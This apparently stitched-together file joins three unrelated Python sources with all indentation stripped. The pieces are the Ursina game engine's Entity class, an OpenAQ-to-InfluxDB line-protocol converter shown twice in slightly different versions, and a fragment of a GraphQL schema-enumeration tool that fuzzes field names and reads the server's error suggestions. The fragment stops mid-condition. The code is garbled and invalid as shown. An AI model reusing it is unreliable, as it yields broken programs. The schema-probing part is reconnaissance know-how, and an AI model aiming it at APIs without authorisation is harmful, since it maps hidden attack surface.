from panda3d.core import CullFaceAttrib
from ursina import application
from ursina.collider import *
from ursina.mesh import Mesh
from ursina.sequence import Sequence, Func, Wait
from ursina.ursinamath import lerp
from ursina import curve
from ursina.curve import CubicBezier
from ursina.mesh_importer import load_model
from ursina.texture_importer import load_texture
from ursina.string_utilities import camel_to_snake
from textwrap import dedent
from ursina.light import *
from ursina import color
try:
from ursina import scene
except:
pass
class Entity(NodePath):
rotation_directions = (-1,-1,1)
def __init__(self, add_to_scene_entities=True, **kwargs):
super().__init__(self.__class__.__name__)
self.name = camel_to_snake(self.type)
self.enabled = True # disabled entities wil not be visible nor run code
self.visible = True
self.ignore = False # if True, will not try to run code
self.eternal = False # eternal entities does not get destroyed on scene.clear()
self.ignore_paused = False
self.ignore_input = False
self.parent = scene
self.add_to_scene_entities = add_to_scene_entities # set to False to be ignored by the engine, but still get rendered.
if add_to_scene_entities:
scene.entities.append(self)
self.model = None # set model with model='model_name' (without file type extention)
self.color = color.white
self.texture = None # set model with texture='texture_name'. requires a model to be set beforehand.
self.reflection_map = scene.reflection_map
self.reflectivity = 0
self.render_queue = 0
self.double_sided = False
# self.always_on_top = False
self.collision = False # toggle collision without changing collider.
self.collider = None # set to 'box'/'sphere'/'mesh' for auto fitted collider.
self.scripts = list() # add with add_script(class_instance). will assign an 'entity' variable to the script.
self.animations = list()
self.hovered = False # will return True if mouse hovers entity.
self.origin = Vec3(0,0,0)
self.position = Vec3(0,0,0) # right, up, forward. can also set self.x, self.y, self.z
self.rotation = Vec3(0,0,0) # can also set self.rotation_x, self.rotation_y, self.rotation_z
self.scale = Vec3(1,1,1) # can also set self.scale_x, self.scale_y, self.scale_z
self.line_definition = None # returns a Traceback(filename, lineno, function, code_context, index).
if application.trace_entity_definition and add_to_scene_entities:
from inspect import getframeinfo, stack
_stack = stack()
caller = getframeinfo(_stack[1][0])
if len(_stack) > 2 and _stack[1].code_context and 'super().__init__()' in _stack[1].code_context[0]:
caller = getframeinfo(_stack[2][0])
self.line_definition = caller
if caller.code_context:
self.code_context = caller.code_context[0]
if (self.code_context.count('(') == self.code_context.count(')') and
' = ' in self.code_context and not 'name=' in self.code_context
and not 'Ursina()' in self.code_context):
self.name = self.code_context.split(' = ')[0].strip().replace('self.', '')
# print('set name to:', self.code_context.split(' = ')[0].strip().replace('self.', ''))
if application.print_entity_definition:
print(f'{Path(caller.filename).name} -> {caller.lineno} -> {caller.code_context}')
for key, value in kwargs.items():
setattr(self, key, value)
# if any lights defined, then apply them to this entity (otherwise use default lighting)
for light in scene.lights:
self.setLight(light.node)
def _list_to_vec(self, value):
if isinstance(value, (int, float, complex)):
return Vec3(value, value, value)
if len(value) % 2 == 0:
new_value = Vec2()
for i in range(0, len(value), 2):
new_value.add_x(value[i])
new_value.add_y(value[i+1])
if len(value) % 3 == 0:
new_value = Vec3()
for i in range(0, len(value), 3):
new_value.add_x(value[i])
new_value.add_y(value[i+1])
new_value.add_z(value[i+2])
return new_value
def enable(self):
self.enabled = True
def disable(self):
self.enabled = False
def __setattr__(self, name, value):
if name == 'enabled':
try:
# try calling on_enable() on classes inheriting from Entity
if value == True:
self.on_enable()
else:
self.on_disable()
except:
pass
if value == True:
if not self.is_singleton():
self.unstash()
else:
if not self.is_singleton():
self.stash()
if name == 'eternal':
for c in self.children:
c.eternal = value
if name == 'world_parent':
self.reparent_to(value)
if name == 'model':
if value is None:
if hasattr(self, 'model') and self.model:
self.model.removeNode()
# print('removed model')
object.__setattr__(self, name, value)
return None
if isinstance(value, NodePath): # pass procedural model
if self.model is not None and value != self.model:
self.model.removeNode()
object.__setattr__(self, name, value)
elif isinstance(value, str): # pass model asset name
m = load_model(value, application.asset_folder)
if not m:
m = load_model(value, application.internal_models_compressed_folder)
if m:
if self.model is not None:
self.model.removeNode()
object.__setattr__(self, name, m)
if isinstance(m, Mesh):
m.recipe = value
# print('loaded model successively')
else:
# if '.' in value:
# print(f'''trying to load model with specific filename extention. please omit it. '{value}' -> '{value.split('.')[0]}' ''')
print('missing model:', value)
return
if self.model:
self.model.reparentTo(self)
self.model.setTransparency(TransparencyAttrib.M_dual)
self.color = self.color # reapply color after changing model
self.texture = self.texture # reapply texture after changing model
self._vert_cache = None
if isinstance(value, Mesh):
if hasattr(value, 'on_assign'):
value.on_assign(assigned_to=self)
return
if name == 'color' and value is not None:
if isinstance(value, str):
value = color.hex(value)
if not isinstance(value, Vec4):
value = Vec4(value[0], value[1], value[2], value[3])
if self.model:
self.model.setColorScaleOff() # prevent inheriting color from parent
self.model.setColorScale(value)
object.__setattr__(self, name, value)
if name == 'collision' and hasattr(self, 'collider') and self.collider:
if value:
self.collider.node_path.unstash()
else:
self.collider.node_path.stash()
object.__setattr__(self, name, value)
return
if name == 'render_queue':
if self.model:
self.model.setBin('fixed', value)
if name == 'double_sided':
self.setTwoSided(value)
try:
super().__setattr__(name, value)
except:
pass
# print('failed to set attribiute:', name)
@property
def parent(self):
try:
return self._parent
except:
return None
@parent.setter
def parent(self, value):
self._parent = value
if value is None:
destroy(self)
else:
try:
self.reparentTo(value)
except:
print('invalid parent:', value)
@property
def type(self):
return self.__class__.__name__
@property
def types(self):
return [c.__name__ for c in inspect.getmro(self.__class__)]
@property
def visible(self):
return self._visible
@visible.setter
def visible(self, value):
self._visible = value
if value:
self.show()
else:
self.hide()
@property
def collider(self):
return self._collider
@collider.setter
def collider(self, value):
# destroy existing collider
if value and hasattr(self, 'collider') and self._collider:
self._collider.remove()
self._collider = value
if value == 'box':
if self.model:
self._collider = BoxCollider(entity=self, center=-self.origin, size=self.model_bounds)
else:
self._collider = BoxCollider(entity=self)
self._collider.name = value
elif value == 'sphere':
self._collider = SphereCollider(entity=self)
self._collider.name = value
elif value == 'mesh' and self.model:
self._collider = MeshCollider(entity=self, mesh=self.model, center=-self.origin)
self._collider.name = value
elif isinstance(value, Mesh):
self._collider = MeshCollider(entity=self, mesh=value, center=-self.origin)
self.collision = bool(self.collider)
return
@property
def origin(self):
return self._origin
@origin.setter
def origin(self, value):
if not self.model:
self._origin = Vec3(0,0,0)
return
if not isinstance(value, (Vec2, Vec3)):
value = self._list_to_vec(value)
if isinstance(value, Vec2):
value = Vec3(*value, self.origin_z)
self._origin = value
self.model.setPos(-value[0], -value[1], -value[2])
@property
def origin_x(self):
return self.origin[0]
@origin_x.setter
def origin_x(self, value):
self.origin = (value, self.origin_y, self.origin_z)
@property
def origin_y(self):
return self.origin[1]
@origin_y.setter
def origin_y(self, value):
self.origin = (self.origin_x, value, self.origin_z)
@property
def origin_z(self):
return self.origin[2]
@origin_z.setter
def origin_z(self, value):
self.origin = (self.origin_x, self.origin_y, value)
@property
def world_position(self):
return Vec3(self.get_position(render))
@world_position.setter
def world_position(self, value):
if not isinstance(value, (Vec2, Vec3)):
value = self._list_to_vec(value)
if isinstance(value, Vec2):
value = Vec3(*value, self.z)
self.setPos(render, Vec3(value[0], value[1], value[2]))
@property
def world_x(self):
return self.getX(render)
@property
def world_y(self):
return self.getY(render)
@property
def world_z(self):
return self.getZ(render)
@world_x.setter
def world_x(self, value):
self.setX(render, value)
@world_y.setter
def world_y(self, value):
self.setY(render, value)
@world_z.setter
def world_z(self, value):
self.setZ(render, value)
@property
def position(self):
return Vec3(*self.getPos())
@position.setter
def position(self, value):
if not isinstance(value, (Vec2, Vec3)):
value = self._list_to_vec(value)
if isinstance(value, Vec2):
value = Vec3(*value, self.z)
self.setPos(value[0], value[1], value[2])
@property
def x(self):
return self.getX()
@x.setter
def x(self, value):
self.setX(value)
@property
def y(self):
return self.getY()
@y.setter
def y(self, value):
self.setY(value)
@property
def z(self):
return self.getZ()
@z.setter
def z(self, value):
self.setZ(value)
@property
def world_rotation(self):
rotation = self.getHpr(base.render)
return Vec3(rotation[1], rotation[0], rotation[2]) * Entity.rotation_directions
@world_rotation.setter
def world_rotation(self, value):
rotation = self.setHpr(Vec3(value[1], value[0], value[2]) * Entity.rotation_directions, base.render)
@property
def world_rotation_x(self):
return self.world_rotation[0]
@world_rotation_x.setter
def world_rotation_x(self, value):
self.world_rotation = Vec3(value, self.world_rotation[1], self.world_rotation[2])
@property
def world_rotation_y(self):
return self.world_rotation[1]
@world_rotation_y.setter
def world_rotation_y(self, value):
self.world_rotation = Vec3(self.world_rotation[0], value, self.world_rotation[2])
@property
def world_rotation_z(self):
return self.world_rotation[2]
@world_rotation_z.setter
def world_rotation_z(self, value):
self.world_rotation = Vec3(self.world_rotation[0], self.world_rotation[1], value)
@property
def rotation(self):
rotation = self.getHpr()
return Vec3(rotation[1], rotation[0], rotation[2]) * Entity.rotation_directions
@rotation.setter
def rotation(self, value):
if not isinstance(value, (Vec2, Vec3)):
value = self._list_to_vec(value)
if isinstance(value, Vec2):
value = Vec3(*value, self.rotation_z)
self.setHpr(Vec3(value[1], value[0], value[2]) * Entity.rotation_directions)
@property
def rotation_x(self):
return self.rotation.x
@rotation_x.setter
def rotation_x(self, value):
self.rotation = Vec3(value, self.rotation[1], self.rotation[2])
@property
def rotation_y(self):
return self.rotation.y
@rotation_y.setter
def rotation_y(self, value):
self.rotation = Vec3(self.rotation[0], value, self.rotation[2])
@property
def rotation_z(self):
return self.rotation.z
@rotation_z.setter
def rotation_z(self, value):
self.rotation = Vec3(self.rotation[0], self.rotation[1], value)
@property
def world_scale(self):
return Vec3(*self.getScale(base.render))
@world_scale.setter
def world_scale(self, value):
if isinstance(value, (int, float, complex)):
value = Vec3(value, value, value)
self.setScale(base.render, value)
@property
def world_scale_x(self):
return self.getScale(base.render)[0]
@world_scale_x.setter
def world_scale_x(self, value):
self.setScale(base.render, Vec3(value, self.world_scale_y, self.world_scale_z))
@property
def world_scale_y(self):
return self.getScale(base.render)[1]
@world_scale_y.setter
def world_scale_y(self, value):
self.setScale(base.render, Vec3(self.world_scale_x, value, self.world_scale_z))
@property
def world_scale_z(self):
return self.getScale(base.render)[2]
@world_scale_z.setter
def world_scale_z(self, value):
self.setScale(base.render, Vec3(self.world_scale_x, value, self.world_scale_z))
@property
def scale(self):
scale = self.getScale()
return Vec3(scale[0], scale[1], scale[2])
@scale.setter
def scale(self, value):
if not isinstance(value, (Vec2, Vec3)):
value = self._list_to_vec(value)
if isinstance(value, Vec2):
value = Vec3(*value, self.scale_z)
value = [e if e!=0 else .001 for e in value]
self.setScale(value[0], value[1], value[2])
@property
def scale_x(self):
return self.scale[0]
@scale_x.setter
def scale_x(self, value):
self.setScale(value, self.scale_y, self.scale_z)
@property
def scale_y(self):
return self.scale[1]
@scale_y.setter
def scale_y(self, value):
self.setScale(self.scale_x, value, self.scale_z)
@property
def scale_z(self):
return self.scale[2]
@scale_z.setter
def scale_z(self, value):
self.setScale(self.scale_x, self.scale_y, value)
@property
def forward(self):
return render.getRelativeVector(self, (0, 0, 1))
@property
def back(self):
return -self.forward
@property
def right(self):
return render.getRelativeVector(self, (1, 0, 0))
@property
def left(self):
return -self.right
@property
def up(self):
return render.getRelativeVector(self, (0, 1, 0))
@property
def down(self):
return -self.up
@property
def screen_position(self):
from ursina import camera
p3 = camera.getRelativePoint(self, Vec3.zero())
full = camera.lens.getProjectionMat().xform(Vec4(*p3, 1))
recip_full3 = 1 / full[3]
p2 = Vec3(full[0], full[1], full[2]) * recip_full3
screen_pos = Vec3(p2[0]*camera.aspect_ratio/2, p2[1]/2, 0)
return screen_pos
@property
def shader(self):
return self._shader
@shader.setter
def shader(self, value):
self._shader = value
if value is None:
self.setShaderAuto()
return
if not hasattr(value, '_shader'):
self.setShader(value)
else:
self.setShader(value._shader)
if value:
value.entity = self
for key, value in value.default_input.items():
self.set_shader_input(key, value)
# try:
# self.setShader(Shader.load(f'{value}.sha', Shader.SL_Cg))
# except:
# self.setShader(Shader.load(Shader.SL_GLSL, vertex=f'{value}.vert', fragment=f'{value}.frag'))
def set_shader_input(self, name, value):
if isinstance(value, Texture):
value = value._texture # make sure to send the panda3d texture to the shader
super().set_shader_input(name, value)
@property
def texture(self):
if not hasattr(self, '_texture'):
return None
return self._texture
@texture.setter
def texture(self, value):
if value is None and self._texture:
# print('remove texture')
self._texture = None
self.setTextureOff(True)
return
if value.__class__ is Texture:
texture = value
elif isinstance(value, str):
texture = load_texture(value)
# print('loaded texture:', texture)
if texture is None:
print('no texture:', value)
return
if texture.__class__ is MovieTexture:
self._texture = texture
self.setTexture(texture)
return
self._texture = texture
if self.model:
self.model.setTexture(texture._texture, 1)
@property
def texture_scale(self):
return self._texture_scale
@texture_scale.setter
def texture_scale(self, value):
self._texture_scale = value
if self.model and self.texture:
self.model.setTexScale(TextureStage.getDefault(), value[0], value[1])
@property
def texture_offset(self):
return self._texture_offset
@texture_offset.setter
def texture_offset(self, value):
if self.model and self.texture:
self.model.setTexOffset(TextureStage.getDefault(), value[0], value[1])
self.texture = self.texture
self._texture_offset = value
@property
def alpha(self):
return self.color[3]
@alpha.setter
def alpha(self, value):
if value > 1:
value = value / 255
self.color = (self.color.h, self.color.s, self.color.v, value)
@property
def always_on_top(self):
return self._always_on_top
@always_on_top.setter
def always_on_top(self, value):
self._always_on_top = value
self.set_bin("fixed", 0)
self.set_depth_write(not value)
self.set_depth_test(not value)
@property
def reflection_map(self):
return self._reflection_map
@reflection_map.setter
def reflection_map(self, value):
if value.__class__ is Texture:
texture = value
elif isinstance(value, str):
texture = load_texture(value)
self._reflection_map = texture
@property
def reflectivity(self):
return self._reflectivity
@reflectivity.setter
def reflectivity(self, value):
self._reflectivity = value
if value == 0:
self.texture = None
if value > 0:
# if self.reflection_map == None:
# self.reflection_map = scene.reflection_map
#
# if not self.reflection_map:
# print('error setting reflectivity. no reflection map')
# return
if not self.normals:
self.model.generate_normals()
# ts = TextureStage('env')
# ts.setMode(TextureStage.MAdd)
# self.model.setTexGen(ts, TexGenAttrib.MEyeSphereMap)
# print('---------------set reflectivity', self.reflection_map)
# self.model.setTexture(ts, self.reflection_map)
self.texture = self._reflection_map
# print('set reflectivity')
def generate_sphere_map(self, size=512, name=f'sphere_map_{len(scene.entities)}'):
from ursina import camera
_name = 'textures/' + name + '.jpg'
org_pos = camera.position
camera.position = self.position
base.saveSphereMap(_name, size=size)
camera.position = org_pos
print('saved sphere map:', name)
self.model.setTexGen(TextureStage.getDefault(), TexGenAttrib.MEyeSphereMap)
self.reflection_map = name
def generate_cube_map(self, size=512, name=f'cube_map_{len(scene.entities)}'):
from ursina import camera
_name = 'textures/' + name
org_pos = camera.position
camera.position = self.position
base.saveCubeMap(_name+'.jpg', size=size)
camera.position = org_pos
print('saved cube map:', name + '.jpg')
self.model.setTexGen(TextureStage.getDefault(), TexGenAttrib.MWorldCubeMap)
self.reflection_map = _name + '#.jpg'
self.model.setTexture(loader.loadCubeMap(_name + '#.jpg'), 1)
@property
def model_bounds(self):
if self.model:
bounds = self.model.getTightBounds()
bounds = Vec3(
Vec3(bounds[1][0], bounds[1][1], bounds[1][2]) # max point
- Vec3(bounds[0][0], bounds[0][1], bounds[0][2]) # min point
)
return bounds
return (0,0,0)
@property
def bounds(self):
return Vec3(
self.model_bounds[0] * self.scale_x,
self.model_bounds[1] * self.scale_y,
self.model_bounds[2] * self.scale_z
)
def reparent_to(self, entity):
if entity is not None:
self.wrtReparentTo(entity)
self._parent = entity
def get_position(self, relative_to=scene):
return self.getPos(relative_to)
def set_position(self, value, relative_to=scene):
self.setPos(relative_to, Vec3(value[0], value[1], value[2]))
def add_script(self, class_instance):
if isinstance(class_instance, object) and type(class_instance) is not str:
class_instance.entity = self
class_instance.enabled = True
setattr(self, camel_to_snake(class_instance.__class__.__name__), class_instance)
self.scripts.append(class_instance)
# print('added script:', camel_to_snake(name.__class__.__name__))
return class_instance
def combine(self, analyze=False, auto_destroy=True):
from ursina.scripts.combine import combine
self.model = combine(self, analyze, auto_destroy)
return self.model
def flip_faces(self):
if not hasattr(self, '_vertex_order'):
self._vertex_order = True
self._vertex_order = not self._vertex_order
if self._vertex_order:
self.setAttrib(CullFaceAttrib.make(CullFaceAttrib.MCullClockwise))
else:
self.setAttrib(CullFaceAttrib.make(CullFaceAttrib.MCullCounterClockwise))
def look_at(self, target, axis='forward'):
from panda3d.core import Quat
if not isinstance(target, Entity):
target = Vec3(*target)
self.lookAt(target)
if axis == 'forward':
return
rotation_offset = {
'back' : Quat(0,0,1,0),
'down' : Quat(-.707,.707,0,0),
'up' : Quat(-.707,-.707,0,0),
'right' : Quat(-.707,0,.707,0),
'left' : Quat(-.707,0,-.707,0),
}[axis]
self.setQuat(rotation_offset * self.getQuat())
def look_at_2d(self, target, axis='z'):
from math import degrees, atan2
if isinstance(target, Entity):
target = Vec3(target.world_position)
pos = target - self.world_position
if axis == 'z':
self.rotation_z = degrees(atan2(pos[0], pos[1]))
def has_ancestor(self, possible_ancestor):
p = self
if isinstance(possible_ancestor, Entity):
# print('ENTITY')
for i in range(100):
if p.parent:
if p.parent == possible_ancestor:
return True
p = p.parent
if isinstance(possible_ancestor, list) or isinstance(possible_ancestor, tuple):
# print('LIST OR TUPLE')
for e in possible_ancestor:
for i in range(100):
if p.parent:
if p.parent == e:
return True
break
p = p.parent
elif isinstance(possible_ancestor, str):
print('CLASS NAME', possible_ancestor)
for i in range(100):
if p.parent:
if p.parent.__class__.__name__ == possible_ancestor:
return True
break
p = p.parent
return False
@property
def children(self):
return [e for e in scene.entities if e.parent == self]
@property
def attributes(self):
return ('name', 'enabled', 'eternal', 'visible', 'parent',
'origin', 'position', 'rotation', 'scale',
'model', 'color', 'texture', 'texture_scale', 'texture_offset',
# 'world_position', 'world_x', 'world_y', 'world_z',
# 'world_rotation', 'world_rotation_x', 'world_rotation_y', 'world_rotation_z',
# 'world_scale', 'world_scale_x', 'world_scale_y', 'world_scale_z',
# 'x', 'y', 'z',
# 'origin_x', 'origin_y', 'origin_z',
# 'rotation_x', 'rotation_y', 'rotation_z',
# 'scale_x', 'scale_y', 'scale_z',
'render_queue', 'always_on_top', 'collision', 'collider', 'scripts')
#------------
# ANIMATIONS
#------------
def animate(self, name, value, duration=.1, delay=0, curve=curve.in_expo, loop=False, resolution=None, interrupt=True, time_step=None, auto_destroy=True):
s = Sequence(
Wait(delay),
Func(self._animate, name, value, duration, curve, loop, resolution, interrupt, time_step, auto_destroy)
)
s.start()
return s
def _animate(self, name, value, duration=.1, curve=curve.in_expo, loop=False, resolution=None, interrupt=True, time_step=None, auto_destroy=True):
animator_name = name + '_animator'
# print('start animating value:', name, animator_name )
if interrupt and hasattr(self, animator_name):
getattr(self, animator_name).pause()
# print('interrupt', animator_name)
else:
try:
getattr(self, animator_name).finish()
except:
pass
setattr(self, animator_name, Sequence(loop=loop, time_step=time_step, auto_destroy=auto_destroy))
sequence = getattr(self, animator_name)
self.animations.append(sequence)
# sequence.append(Wait(delay))
if not resolution:
resolution = max(int(duration * 60), 1)
for i in range(resolution+1):
t = i / resolution
# if isinstance(curve, CubicBezier):
# t = curve.calculate(t)
# else:
t = curve(t)
sequence.append(Wait(duration / resolution))
sequence.append(Func(setattr, self, name, lerp(getattr(self, name), value, t)))
sequence.start()
return sequence
def animate_position(self, value, duration=.1, **kwargs):
x = self.animate('x', value[0], duration, **kwargs)
y = self.animate('y', value[1], duration, **kwargs)
z = None
if len(value) > 2:
z = self.animate('z', value[2], duration, **kwargs)
return x, y, z
def animate_rotation(self, value, duration=.1, **kwargs):
x = self.animate('rotation_x', value[0], duration, **kwargs)
y = self.animate('rotation_y', value[1], duration, **kwargs)
z = self.animate('rotation_z', value[2], duration, **kwargs)
return x, y, z
def animate_scale(self, value, duration=.1, **kwargs):
if isinstance(value, (int, float, complex)):
value = Vec3(value, value, value)
return self.animate('scale', value, duration, **kwargs)
# generate animation functions
for e in ('x', 'y', 'z', 'rotation_x', 'rotation_y', 'rotation_z', 'scale_x', 'scale_y', 'scale_z'):
exec(dedent(f'''
def animate_{e}(self, value, duration=.1, delay=0, **kwargs):
return self.animate('{e}', value, duration=duration, delay=delay, **kwargs)
'''))
def shake(self, duration=.2, magnitude=1, speed=.05, direction=(1,1)):
import random
s = Sequence()
original_position = self.position
for i in range(int(duration / speed)):
s.append(Func(self.set_position,
Vec3(
original_position[0] + (random.uniform(-.1, .1) * magnitude * direction[0]),
original_position[1] + (random.uniform(-.1, .1) * magnitude * direction[1]),
original_position[2],
)))
s.append(Wait(speed))
s.append(Func(self.set_position, original_position))
s.start()
return s
def animate_color(self, value, duration=.1, **kwargs):
return self.animate('color', value, duration, **kwargs)
def fade_out(self, value=0, duration=.5, **kwargs):
return self.animate('color', Vec4(self.color[0], self.color[1], self.color[2], value), duration, **kwargs)
def fade_in(self, value=1, duration=.5, **kwargs):
return self.animate('color', Vec4(self.color[0], self.color[1], self.color[2], value), duration, **kwargs)
def blink(self, value=color.clear, duration=.1, delay=0, curve=curve.in_expo_boomerang, **kwargs):
return self.animate_color(value, duration=duration, delay=delay, curve=curve, **kwargs)
def intersects(self, traverse_target=scene, ignore=(), debug=False):
if not self.collision or not self.collider:
return False
from ursina.hit_info import HitInfo
from ursina import distance
if not hasattr(self, '_picker'):
from panda3d.core import CollisionTraverser, CollisionNode, CollisionHandlerQueue
from panda3d.core import CollisionRay, CollisionSegment, CollisionBox
self._picker = CollisionTraverser() # Make a traverser
self._pq = CollisionHandlerQueue() # Make a handler
self._pickerNode = CollisionNode('raycaster')
self._pickerNode.set_into_collide_mask(0)
self._pickerNP = self.attach_new_node(self._pickerNode)
self._picker.addCollider(self._pickerNP, self._pq)
self._pickerNP.show()
self._pickerNode.addSolid(self._collider.shape)
if debug:
self._pickerNP.show()
else:
self._pickerNP.hide()
self._picker.traverse(traverse_target)
if self._pq.get_num_entries() == 0:
self.hit = HitInfo(hit=False)
return self.hit
ignore = (self,)
ignore += tuple([e for e in scene.entities if not e.collision])
self._pq.sort_entries()
self.entries = [ # filter out ignored entities
e for e in self._pq.getEntries()
if e.get_into_node_path().parent not in ignore
]
if len(self.entries) == 0:
self.hit = HitInfo(hit=False)
return self.hit
collision = self.entries[0]
nP = collision.get_into_node_path().parent
point = collision.get_surface_point(nP)
point = Vec3(*point)
world_point = collision.get_surface_point(render)
world_point = Vec3(*world_point)
hit_dist = distance(self.world_position, world_point)
if nP.name.endswith('.egg'):
nP = nP.parent
self.hit = HitInfo(hit=True)
for e in scene.entities:
if e == nP:
self.hit.entity = e
self.hit.point = point
self.hit.world_point = world_point
self.hit.distance = hit_dist
normal = collision.get_surface_normal(collision.get_into_node_path().parent)
self.hit.normal = Vec3(*normal)
normal = collision.get_surface_normal(render)
self.hit.world_normal = Vec3(*normal)
return self.hit
self.hit = HitInfo(hit=False)
return self.hit
if __name__ == '__main__':
from ursina import *
app = main.Ursina()
e = Entity(model='quad', color=color.orange, position=(0,0,1), scale=1.5, rotation=(0,0,45), texture='brick')
'''example of inheriting Entity'''
class Player(Entity):
def __init__(self, **kwargs):
super().__init__()
self.model='cube'
self.color = color.red
self.scale_y = 2
for key, value in kwargs.items():
setattr(self, key, value)
# input and update functions gets automatically called by the engine
def input(self, key):
if key == 'space':
# self.color = self.color.inverse()
self.animate_x(2, duration=1)
def update(self):
self.x += held_keys['d'] * time.dt * 10
self.x -= held_keys['a'] * time.dt * 10
player = Player(x=-1)
# test
e = Entity(model='cube')
# e.animate_x(3, duration=2, delay=.5, loop=True)
# e.animate_position(Vec3(1,1,1), duration=1, loop=True)
# e.animate_rotation(Vec3(45,45,45))
# e.animate_scale(2, duration=1, curve=curve.out_expo_boomerang, loop=True)
# e.animate_color(color.green, loop=True)
# e.shake()
# e.fade_out(delay=.5)
# e.fade_in(delay=2.5)
e.blink(color.red, duration=1, curve=curve.linear_boomerang, loop=True)
app.run()
|
#!/usr/bin/env python3
import sys
import json
from datetime import datetime
'''
A sample line:
{
"date": {
"utc": "2020-06-05T23:30:00.000Z",
"local": "2020-06-06T04:00:00+04:30"
},
"parameter": "pm25",
"value": 22,
"unit": "µg/m³",
"averagingPeriod": {
"value": 1,
"unit": "hours"
},
"location": "US Diplomatic Post: Kabul",
"city": "Kabul",
"country": "AF",
"coordinates": {
"latitude": 34.535812,
"longitude": 69.190514
},
"attribution": [
{
"name": "EPA AirNow DOS",
"url": "http://airnow.gov/index.cfm?action=airnow.global_summary"
}
],
"sourceName": "StateAir_Kabul",
"sourceType": "government",
"mobile": false
}
'''
measurement_name = 'aq_measurement'
tagset_headers = 'location,city,country,parameter,unit'.split(',')
fieldset_headers = 'value'.split(',')
# Note: Similar to csv2lineprotocol but slightly different
# because JSON contains nested fields like date and coordinates
for line in sys.stdin:
row = json.loads(line)
tagset = []
fieldset = []
for tag_name in tagset_headers:
tag_value = row[tag_name].replace(' ', '\ ')
tagset.append(f'{tag_name}={tag_value}')
for field_name in fieldset_headers:
fieldset.append(f'{field_name}={row[field_name]}')
timestamp = datetime.strptime(row['date']['utc'], "%Y-%m-%dT%H:%M:%S.%fZ").timestamp()
timestamp = int(timestamp) * 1_000_000_000 # to nanoseconds
line = f'{measurement_name},{','.join(tagset)} {','.join(fieldset)} {timestamp}'
print(line) | #!/usr/bin/env python3
import sys
import json
from datetime import datetime
'''
A sample line:
{
"date": {
"utc": "2020-06-05T23:30:00.000Z",
"local": "2020-06-06T04:00:00+04:30"
},
"parameter": "pm25",
"value": 22,
"unit": "µg/m³",
"averagingPeriod": {
"value": 1,
"unit": "hours"
},
"location": "US Diplomatic Post: Kabul",
"city": "Kabul",
"country": "AF",
"coordinates": {
"latitude": 34.535812,
"longitude": 69.190514
},
"attribution": [
{
"name": "EPA AirNow DOS",
"url": "http://airnow.gov/index.cfm?action=airnow.global_summary"
}
],
"sourceName": "StateAir_Kabul",
"sourceType": "government",
"mobile": false
}
'''
measurement_name = 'aq_measurement'
tagset_headers = 'location,city,country,parameter,unit'.split(',')
fieldset_headers = 'value'.split(',')
# Note: Similar to csv2lineprotocol but slightly different
# because JSON contains nested fields like date and coordinates
for line in sys.stdin:
row = json.loads(line)
tagset = []
fieldset = []
for tag_name in tagset_headers:
tag_value = row[tag_name].replace(' ', '\ ')
tagset.append(f'{tag_name}={tag_value}')
for field_name in fieldset_headers:
fieldset.append(f'{field_name}={row[field_name]}')
timestamp = datetime.strptime(row['date']['utc'], "%Y-%m-%dT%H:%M:%S.%fZ").timestamp()
timestamp = int(timestamp) * 1_000_000_000 # to nanoseconds
line = f'{measurement_name},{",".join(tagset)} {",".join(fieldset)} {timestamp}'
print(line) |
import re
import logging
from typing import Any
from typing import Set
from typing import List
from typing import Dict
from typing import Optional
from httpx import ReadTimeout
from json.decoder import JSONDecodeError
from clairvoyancex import graphql
def get_valid_fields(error_message: str) -> Set:
valid_fields = set()
multiple_suggestions_re = 'Cannot query field "([_A-Za-z][_0-9A-Za-z]*)" on type "[_A-Za-z][_0-9A-Za-z]*". Did you mean (?P<multi>("[_A-Za-z][_0-9A-Za-z]*", )+)(or "(?P<last>[_A-Za-z][_0-9A-Za-z]*)")?\?'
or_suggestion_re = 'Cannot query field "[_A-Za-z][_0-9A-Za-z]*" on type "[_A-Za-z][_0-9A-Za-z]*". Did you mean "(?P<one>[_A-Za-z][_0-9A-Za-z]*)" or "(?P<two>[_A-Za-z][_0-9A-Za-z]*)"\?'
single_suggestion_re = 'Cannot query field "([_A-Za-z][_0-9A-Za-z]*)" on type "[_A-Za-z][_0-9A-Za-z]*". Did you mean "(?P<field>[_A-Za-z][_0-9A-Za-z]*)"\?'
invalid_field_re = (
'Cannot query field "[_A-Za-z][_0-9A-Za-z]*" on type "[_A-Za-z][_0-9A-Za-z]*".'
)
# TODO: this regex here more than one time, make it shared?
valid_field_regexes = [
'Field "(?P<field>[_A-Za-z][_0-9A-Za-z]*)" of type "(?P<typeref>[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*)" must have a selection of subfields. Did you mean "[_A-Za-z][_0-9A-Za-z]* \{ ... \}"\?',
]
no_fields_regex = 'Field "[_A-Za-z][_0-9A-Za-z]*" must not have a selection since type "[0-9a-zA-Z\[\]!]+" has no subfields.'
if re.fullmatch(no_fields_regex, error_message):
return valid_fields
if re.fullmatch(multiple_suggestions_re, error_message):
match = re.fullmatch(multiple_suggestions_re, error_message)
for m in match.group("multi").split(", "):
if m:
valid_fields.add(m.strip('"'))
if match.group("last"):
valid_fields.add(match.group("last"))
elif re.fullmatch(or_suggestion_re, error_message):
match = re.fullmatch(or_suggestion_re, error_message)
valid_fields.add(match.group("one"))
valid_fields.add(match.group("two"))
elif re.fullmatch(single_suggestion_re, error_message):
match = re.fullmatch(single_suggestion_re, error_message)
valid_fields.add(match.group("field"))
elif re.fullmatch(invalid_field_re, error_message):
pass
elif re.fullmatch(valid_field_regexes[0], error_message):
match = re.fullmatch(valid_field_regexes[0], error_message)
valid_fields.add(match.group("field"))
else:
logging.warning(f"Unknown error message: '{error_message}'")
return valid_fields
def probe_valid_fields(
wordlist: Set, config: graphql.Config, input_document: str
) -> Set[str]:
# We're assuming all fields from wordlist are valid,
# then remove fields that produce an error message
valid_fields = set(wordlist)
with graphql.new_client(
http2=config.http2,
verify=config.verify,
proxies=config.proxy,
timeout=config.timeout,
) as client:
for i in range(0, len(wordlist), config.bucket_size):
bucket = wordlist[i : i + config.bucket_size]
document = input_document.replace("FUZZ", " ".join(bucket))
# TODO: implement retries in case of failure
try:
response = graphql.request(
client=client,
command=config.command,
url=config.url,
headers=config.headers,
params=config.params,
json={"query": document},
)
except ReadTimeout:
logging.warning('Timeout on function probe_valid_fields with value '
+ f'{document=}. Try increasing timeout with option "-t". Skipping request')
continue
try:
errors = response.json().get("errors", [])
except JSONDecodeError:
logging.warning(f'Invalid response for request with {document=}')
continue
else:
logging.debug(
f"Sent {len(bucket)} fields, recieved {len(errors)} errors in {response.elapsed.total_seconds()} seconds"
)
for error in errors:
error_message = error["message"]
if (
"must not have a selection since type" in error_message
